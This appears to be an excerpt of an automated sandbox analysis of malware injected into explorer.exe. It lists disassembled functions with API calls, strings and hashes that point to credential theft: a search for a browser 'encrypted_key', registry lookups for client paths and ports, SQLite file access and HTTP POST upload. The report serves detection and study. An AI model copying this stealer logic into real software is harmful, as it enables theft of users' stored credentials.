                                                                                                                                        control_flow_graph 576 2751333-2751385 call 2751000 call 275106c call 27512a3 583 2751387-275139e 576->583 584 27513a0-27513a3 576->584 587 27513b0-27513b2 583->587 586 27513aa-27513ac 584->586 586->587 588 27513b8-27513ef RtlZeroMemory 587->588 589 27515cb-27515da call 2751011 587->589 593 27513f5-275141a 588->593 594 27515c3-27515ca 588->594 597 2751420-2751456 call 27510b1 593->597 598 27515bf 593->598 594->589 601 275145d-2751478 597->601 602 2751458 597->602 598->594 604 27515b5 601->604 605 275147e-2751483 601->605 602->601 604->598 606 2751485-2751496 605->606 607 275149d-27514c7 call 2751000 wsprintfW 605->607 606->607 610 27514e0-2751509 607->610 611 27514c9-27514cb 607->611 618 27515a5 610->618 619 275150f-275151b 610->619 612 27514cc-27514cf 611->612 614 27514d1-27514d6 612->614 615 27514da-27514dc 612->615 614->612 616 27514d8 614->616 615->610 616->610 621 27515ac-27515b0 call 2751011 618->621 619->618 622 2751521-2751537 call 2751000 619->622 621->604 626 2751539-2751544 622->626 627 2751546-2751553 call 275102f 626->627 628 2751558-275156f 626->628 627->628 632 2751571 628->632 633 2751573-275157d 628->633 632->633 633->626 634 275157f-2751583 633->634 635 2751585 call 275104c 634->635 636 275159a-27515a1 call 2751011 634->636 639 275158a-2751594 RtlMoveMemory 635->639 636->618 639->636
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                          • Part of subcall function 0275106C: lstrlen.KERNEL32(02D7713E,00000000,00000000,00000000,02751366,74DE8A60,02D7713E,00000000), ref: 02751074
                                                                                                                                          • Part of subcall function 0275106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02D7713E,00000001,00000000,00000000), ref: 02751086
                                                                                                                                          • Part of subcall function 027512A3: RtlZeroMemory.NTDLL(?,00000018), ref: 027512B5
                                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 027513C2
                                                                                                                                        • wsprintfW.USER32 ref: 027514B5
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02751594
                                                                                                                                        Strings
                                                                                                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 027514FB
                                                                                                                                        • Accept: */*Referer: %S, xrefs: 027514AF
                                                                                                                                        • POST, xrefs: 02751465
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                        • API String ID: 3833683434-704803497
                                                                                                                                        • Opcode ID: feaaf7d497ac3526f395c48af897703d2d61a99115d4572c53097086d7e06442
                                                                                                                                        • Instruction ID: 8da5e1cfc1277e64a7ffec97dfc8a8cbf7978e191aacd0f3fda81c34a3a5fc6a
                                                                                                                                        • Opcode Fuzzy Hash: feaaf7d497ac3526f395c48af897703d2d61a99115d4572c53097086d7e06442
                                                                                                                                        • Instruction Fuzzy Hash: 047168B5A08311AFDB109F24D888A2BBBEDEF88355F44492DF959D3251DBB0D904CB92
                                                                                                                                        Function 0275B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 667 275b1e5-275b20b 668 275b221-275b22a 667->668 669 275b20d-275b218 call 275aeea 667->669 670 275b240-275b243 668->670 671 275b22c-275b237 call 275ae65 668->671 677 275b21e 669->677 678 275b3ea-275b3f0 669->678 674 275b3b9-275b3d3 670->674 675 275b249-275b26b call 275a7ae 670->675 682 275b3b4-275b3b7 671->682 683 275b23d 671->683 681 275b3db-275b3df 674->681 688 275b296-275b29f 675->688 689 275b26d-275b278 675->689 677->668 685 275b3e1-275b3e3 681->685 686 275b3e8 681->686 682->674 690 275b3d5-275b3d8 682->690 683->670 685->686 687 275b3e5-275b3e7 685->687 686->678 687->686 691 275b2d6-275b2ea call 2756a5a 688->691 692 275b2a1 688->692 693 275b27d-275b291 call 275a1c6 689->693 690->681 701 275b2f6-275b2fd 691->701 702 275b2ec-275b2f1 691->702 694 275b2a3-275b2a7 692->694 695 275b2a9-275b2ad 692->695 693->682 694->691 694->695 695->682 697 275b2b3-275b2b9 call 275a67c 695->697 704 275b2be-275b2c2 697->704 705 275b373 701->705 706 275b2ff-275b30e 701->706 702->682 704->691 709 275b2c4-275b2d4 704->709 708 275b377-275b37a 705->708 706->708 710 275b310-275b329 CreateFileMappingW 708->710 711 275b37c 708->711 709->693 712 275b37e-275b3ab call 275a1c6 710->712 713 275b32b-275b357 MapViewOfFile 710->713 711->682 712->682 718 275b3ad 712->718 713->712 714 275b359-275b370 713->714 714->705 718->682
                                                                                                                                        APIs
                                                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0275B31D
                                                                                                                                        • MapViewOfFile.KERNEL32(?,?,00000000,?,?), ref: 0275B34F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateMappingView
                                                                                                                                        • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                        • API String ID: 3452162329-3826999013
                                                                                                                                        • Opcode ID: 00438e8d62bc29cdc47648026274d36f2d5fa414b71102c793af29092b2128d0
                                                                                                                                        • Instruction ID: c5740d178df71049915ca372d92bce685e232cabeec9c0423f93493aaa77c169
                                                                                                                                        • Opcode Fuzzy Hash: 00438e8d62bc29cdc47648026274d36f2d5fa414b71102c793af29092b2128d0
                                                                                                                                        • Instruction Fuzzy Hash: F251BF71600751DFDB26CF18C855B2BB7E6FB88318F10992EEC869B254DBB0E815CB61
                                                                                                                                        Function 0275A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 719 275a40e-275a424 720 275a426-275a42a 719->720 721 275a4a2-275a4aa 719->721 722 275a431-275a441 720->722 723 275a42c-275a42f 720->723 724 275a4ae-275a4c8 721->724 725 275a443 722->725 726 275a469-275a4a0 memcpy 722->726 723->721 723->722 727 275a4cc-275a4e3 ReadFile 724->727 728 275a445-275a448 725->728 729 275a44a-275a45a memcpy 725->729 726->724 730 275a4e5-275a4ee 727->730 731 275a524-275a538 call 275a2aa 727->731 728->726 728->729 732 275a45d 729->732 730->731 738 275a4f0-275a4ff call 275a250 730->738 731->732 737 275a53e-275a553 memset 731->737 734 275a45f-275a466 732->734 737->734 738->727 741 275a501-275a51f call 275a1c6 738->741 741->734
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy$FileReadmemset
                                                                                                                                        • String ID: winRead
                                                                                                                                        • API String ID: 2051157613-2759563040
                                                                                                                                        • Opcode ID: 0403872fd334f1f5e50b7f527b24e6ac20c2380a5f0853a7d8f0c649afaa1dc4
                                                                                                                                        • Instruction ID: 6b4ae98c8cdd79bc52e49c1704a4b097e1393dc3f04d4feb6058e78a0cf2109b
                                                                                                                                        • Opcode Fuzzy Hash: 0403872fd334f1f5e50b7f527b24e6ac20c2380a5f0853a7d8f0c649afaa1dc4
                                                                                                                                        • Instruction Fuzzy Hash: 0431AD72604360AFC740DE68CC9899FB7E6EFC8310F845A28FD8597210D7B0ED048B92
                                                                                                                                        Function 02752E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • StrStrIW.SHLWAPI(?,?), ref: 02752E4B
                                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 02752EE4
                                                                                                                                        • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02752F54
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 02752F62
                                                                                                                                          • Part of subcall function 027519E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A1E
                                                                                                                                          • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A3C
                                                                                                                                          • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A75
                                                                                                                                          • Part of subcall function 027519E5: RegCloseKey.KERNEL32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A98
                                                                                                                                          • Part of subcall function 02751BC5: lstrlenW.KERNEL32(00000000,00000000,?,02752E75,PathToExe,00000000,00000000), ref: 02751BCC
                                                                                                                                          • Part of subcall function 02751BC5: StrStrIW.SHLWAPI(00000000,.exe,?,02752E75,PathToExe,00000000,00000000), ref: 02751BF0
                                                                                                                                          • Part of subcall function 02751BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02752E75,PathToExe,00000000,00000000), ref: 02751C05
                                                                                                                                          • Part of subcall function 02751BC5: lstrlenW.KERNEL32(00000000,?,02752E75,PathToExe,00000000,00000000), ref: 02751C1C
                                                                                                                                          • Part of subcall function 02751AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02752E83,PathToExe,00000000,00000000), ref: 02751B16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                        • String ID: PathToExe
                                                                                                                                        • API String ID: 1799103994-1982016430
                                                                                                                                        • Opcode ID: 6a616e03a967c715dfb747453ca6600745c11e77cc2e9580f03282dd0a84c903
                                                                                                                                        • Instruction ID: a9e620e3b70d3621b933c16c3f5a5f7073149e10b219625d2d2b1b065f2be487
                                                                                                                                        • Opcode Fuzzy Hash: 6a616e03a967c715dfb747453ca6600745c11e77cc2e9580f03282dd0a84c903
                                                                                                                                        • Instruction Fuzzy Hash: 67316D71604261AF9B16AF21CC18D7FBAAAEFC4750B04851DFC5997280EFB4C906CFA1
                                                                                                                                        Function 0275A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 782 275a67c-275a692 783 275a694-275a6bf _alldiv _allmul 782->783 784 275a6c1-275a6c4 782->784 785 275a6c7-275a6d2 call 275a33b 783->785 784->785 788 275a6d4-275a6df 785->788 789 275a6f0-275a6fb SetEndOfFile 785->789 790 275a6e4-275a6ee call 275a1c6 788->790 791 275a6fd-275a708 789->791 792 275a71e 789->792 793 275a722-275a726 790->793 791->792 799 275a70a-275a71c 791->799 792->793 795 275a728-275a72b 793->795 796 275a73a-275a740 793->796 795->796 800 275a72d 795->800 799->790 801 275a734-275a737 800->801 802 275a72f-275a732 800->802 801->796 802->796 802->801
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File_alldiv_allmul
                                                                                                                                        • String ID: winTruncate1$winTruncate2
                                                                                                                                        • API String ID: 3568847005-470713972
                                                                                                                                        • Opcode ID: 10549e9732466ed38f6a6a931e4e9cc6bd1e476a98f7d27c07a30eb64940bd80
                                                                                                                                        • Instruction ID: 678b7f5f864f868d37796b55664321a9a9b26325c5d3df6e0376ae70d4b4ad03
                                                                                                                                        • Opcode Fuzzy Hash: 10549e9732466ed38f6a6a931e4e9cc6bd1e476a98f7d27c07a30eb64940bd80
                                                                                                                                        • Instruction Fuzzy Hash: F421D172600225ABDF148F2DCCA4E6BB7AAEF84310F418679FD04DB245D7B5D810CBA1
                                                                                                                                        Function 02754A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • wsprintfW.USER32 ref: 02754AA2
                                                                                                                                        • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02754AC7
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 02754AD4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                                        • String ID: %s\%08x$Software
                                                                                                                                        • API String ID: 1800864259-1658101971
                                                                                                                                        • Opcode ID: 504d5ded76017218c9f014676f1e4da9ac3794881dfb088128a751416e07f496
                                                                                                                                        • Instruction ID: 42d3d70fdedf42e416a7e012fe966ccfb7cc8309747a0adb4d32ce5447db75bc
                                                                                                                                        • Opcode Fuzzy Hash: 504d5ded76017218c9f014676f1e4da9ac3794881dfb088128a751416e07f496
                                                                                                                                        • Instruction Fuzzy Hash: EC01F771A40118BFEB189F54DC4AEBFBBADEB81354B44016EF909A3140E7B05D50D664
                                                                                                                                        Function 02754317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _alloca_probe.NTDLL ref: 0275431C
                                                                                                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 02754335
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02754363
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 027543C8
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                          • Part of subcall function 0275418A: wsprintfW.USER32 ref: 02754212
                                                                                                                                          • Part of subcall function 02751011: GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
                                                                                                                                          • Part of subcall function 02751011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 027543B9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 801677237-0
                                                                                                                                        • Opcode ID: 88bbcc94f2c2cc2b389a7b38a2251dbdcca15f31a5f36ec96dfbf58c4f2a08f9
                                                                                                                                        • Instruction ID: 5d10823948c77eed8fd84b5278dc78f4378aa157a145f4ba4a0a23f27c9a7251
                                                                                                                                        • Opcode Fuzzy Hash: 88bbcc94f2c2cc2b389a7b38a2251dbdcca15f31a5f36ec96dfbf58c4f2a08f9
                                                                                                                                        • Instruction Fuzzy Hash: 0A1186B15042117FE7159F10DC59DBFB7DDEF84314F044A2DF849D2150EBB49D489A62
                                                                                                                                        Function 0275B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 0275B8D5
                                                                                                                                        • CreateFileW.KERNEL32(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0275B96F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFilememset
                                                                                                                                        • String ID: psow$winOpen
                                                                                                                                        • API String ID: 2416746761-4101858489
                                                                                                                                        • Opcode ID: a6f5702db1640e3fa9c7ac50bde9664745fafc5f50f8945bdf687304d56eb35a
                                                                                                                                        • Instruction ID: 352460e21b687e99cf7fff081949fb2fb567135d49f51078d7283b3ac05f4883
                                                                                                                                        • Opcode Fuzzy Hash: a6f5702db1640e3fa9c7ac50bde9664745fafc5f50f8945bdf687304d56eb35a
                                                                                                                                        • Instruction Fuzzy Hash: DA715C71A047219FD711DF24C88572AFBE5BF88728F005A2DF864A7284D7B4E954CF92
                                                                                                                                        Function 027B9247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.00000000027B7000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B7000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_27b7000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d3630c40df3110ee09b219fad5869862f09d38708a96374ed10907fbfa5b2522
                                                                                                                                        • Instruction ID: d58128291962139d7e79c7dab109ac6701168f60ccfcb2990cf855ee67909e5d
                                                                                                                                        • Opcode Fuzzy Hash: d3630c40df3110ee09b219fad5869862f09d38708a96374ed10907fbfa5b2522
                                                                                                                                        • Instruction Fuzzy Hash: 1EA119B2954752DFD7228E78DCC47E1BBA5EF42224B1C066DC7F19B2C2E760540ACB61
                                                                                                                                        Function 027519E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A1E
                                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A3C
                                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A75
                                                                                                                                        • RegCloseKey.KERNEL32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A98
                                                                                                                                          • Part of subcall function 02751011: GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
                                                                                                                                          • Part of subcall function 02751011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 217796345-0
                                                                                                                                        • Opcode ID: 1fec1e7a18f2744218fbc9ba68f07aa24d7deb1fd938f957e5b015fcc31eaf3b
                                                                                                                                        • Instruction ID: d212aa7d3500bccdd68b17703bf47e6c3d46f37807d9fac09f2e662dee735e81
                                                                                                                                        • Opcode Fuzzy Hash: 1fec1e7a18f2744218fbc9ba68f07aa24d7deb1fd938f957e5b015fcc31eaf3b
                                                                                                                                        • Instruction Fuzzy Hash: F421BF72604251AFEB268A21CD48F3BF7EDEBC875AF444A2DFD8D92140E7B0CD408661
                                                                                                                                        Function 02751EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 02751ED5
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02751F0C
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02751F98
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02751F82
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1077800024-0
                                                                                                                                        • Opcode ID: 0391e2bf532a8850416e3a02b1b2b9fc2d2c9df71f85583e33eff7dfbdefdbc5
                                                                                                                                        • Instruction ID: ffe832b3b939fb73d2f5a9a1bd97aa8191423eb687c238aa4ba49b9577f3568c
                                                                                                                                        • Opcode Fuzzy Hash: 0391e2bf532a8850416e3a02b1b2b9fc2d2c9df71f85583e33eff7dfbdefdbc5
                                                                                                                                        • Instruction Fuzzy Hash: 1C21AE706083516FDB05AB20DC48E3BBBEEEFC8315F40892CF89D92140EBB4C8149B62
                                                                                                                                        Function 02751C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02753E1E,00000000,?,02753FA8), ref: 02751C46
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,02753FA8), ref: 02751C56
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,02753FA8), ref: 02751C91
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,02753FA8), ref: 02751C76
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2517252058-0
                                                                                                                                        • Opcode ID: 5e354f38dcd3f2209cc261e7afc45fb7830be93dbe3eae28f30c23f55598f7a0
                                                                                                                                        • Instruction ID: e87d71547d40ea589f0775a12b85f9b008a14cbc089627d5196c1d61cc138661
                                                                                                                                        • Opcode Fuzzy Hash: 5e354f38dcd3f2209cc261e7afc45fb7830be93dbe3eae28f30c23f55598f7a0
                                                                                                                                        • Instruction Fuzzy Hash: CAF028322012287BD6201A25DC8CF7BBB5CDB826FBF160718FC1E921C0FBA368515171
                                                                                                                                        Function 02752FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,"encrypted_key":",00000000,00000000,00000000,02753E30,00000000,00000000,?,02753FA8), ref: 02752FC1
                                                                                                                                        • lstrlen.KERNEL32("encrypted_key":",?,02753FA8), ref: 02752FCE
                                                                                                                                        • StrStrIA.SHLWAPI("encrypted_key":",027A692C,?,02753FA8), ref: 02752FDD
                                                                                                                                          • Part of subcall function 0275190B: lstrlen.KERNEL32(?,?,?,?,00000000,02752783), ref: 0275192B
                                                                                                                                          • Part of subcall function 0275190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02752783), ref: 02751930
                                                                                                                                          • Part of subcall function 0275190B: lstrcat.KERNEL32(00000000,?), ref: 02751946
                                                                                                                                          • Part of subcall function 0275190B: lstrcat.KERNEL32(00000000,00000000), ref: 0275194A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcat
                                                                                                                                        • String ID: "encrypted_key":"
                                                                                                                                        • API String ID: 493641738-877455259
                                                                                                                                        • Opcode ID: b10946c4346c4e687d8f341b1c70b1f2e02602d1b55e4f84ecafeae2a7625801
                                                                                                                                        • Instruction ID: 9ab23b1c75348fc98a9fd0eb436efe55b191736d33191b6378c98497d9b649ea
                                                                                                                                        • Opcode Fuzzy Hash: b10946c4346c4e687d8f341b1c70b1f2e02602d1b55e4f84ecafeae2a7625801
                                                                                                                                        • Instruction Fuzzy Hash: 12E02222F4A6745F9B266BB56C98847BF0CAE8312530D4068EE0283143DFE28802D7A4
                                                                                                                                        Function 0275BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0275BB40
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
